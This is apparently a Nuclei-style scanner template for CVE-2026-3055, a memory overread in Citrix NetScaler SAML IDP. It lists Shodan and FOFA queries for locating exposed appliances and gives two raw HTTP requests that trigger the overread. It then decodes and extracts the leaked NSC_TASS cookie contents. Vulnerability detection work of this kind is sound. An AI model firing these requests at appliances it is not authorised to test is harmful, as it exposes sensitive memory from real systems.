id: CVE-2026-3055

info:
  name: Citrix NetScaler SAML IDP - Memory Overread
  author: watchtowr,shaikhyaser,DhiyaneshDk
  severity: critical
  description: |
    NetScaler ADC and NetScaler Gateway contain an insufficient input validation vulnerability when configured as a SAML IDP, leading to a memory overread that lets attackers potentially access sensitive memory. Exploitation requires the appliance to be configured as a SAML IDP.
  impact: |
    Attackers can cause memory overread, potentially exposing sensitive information or causing application instability.
  remediation: Update to the latest version with the fix for this vulnerability.
  reference:
    - https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696300
    - https://labs.watchtowr.com/the-sequels-are-never-as-good-but-were-still-in-pain-citrix-netscaler-cve-2026-3055-memory-overread/
    - https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/
  metadata:
    verified: true
    max-request: 2
    shodan-query:
      - title:"NetScaler Gateway"
      - title:"NetScaler AAA"
      - http.favicon.hash:-1166125415
      - http.favicon.hash:-1292923998
    fofa-query:
      - title="NetScaler Gateway"
      - title="NetScaler AAA"
      - icon_hash="-1166125415"
      - icon_hash="-1292923998"
  tags: cve,cve2026,netscaler,citrix,exposure,kev,vkev,vuln

flow: http(1) || http(2)

http:
  - raw:
      - |
        POST /saml/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip

        SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCB4bWxuczpzYW1scD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOnByb3RvY29sIiANCnhtbG5zOnNhbWw9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphc3NlcnRpb24iICANCklEPSJfMSINClZlcnNpb249IjIuMCIgUHJvdmlkZXJOYW1lPSJteSBwcm92aWRlciIgDQpEZXN0aW5hdGlvbj0iaHR0cDovL3dhdGNodG93ci9zYW1sLnBocCIgDQpQcm90b2NvbEJpbmRpbmc9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpiaW5kaW5nczpIVFRQLVBPU1QiIA0KPg0KICA8c2FtbDpJc3N1ZXI%2BaHR0cDovL3dhdGNodG93ci9zYW1sLnBocDwvc2FtbDpJc3N1ZXI%2BDQo8L3NhbWxwOkF1dGhuUmVxdWVzdD4%3D
      - |
        GET /wsfed/passive?wctx HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - regex('(?i)NSC_TASS=[A-Za-z0-9+/]+=*', set_cookie)
          - 'status_code == 302'
          - 'contains(base64_decode(nsc_tass), "wctx=")'
          - '!contains(body, "Parsing of presented Assertion failed")'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - base64_decode(nsc_tass)
# digest: 4a0a004730450220406d2dccc32a82831ddc8dfdec81d513c70d55da7324594a5ead9cdcf01a770102210086e0c3ca49f0abb8959e67730de028261f4ef59e17332d52ac062fc0e84d5a40:922c64590222798bb761d5b6d8e72950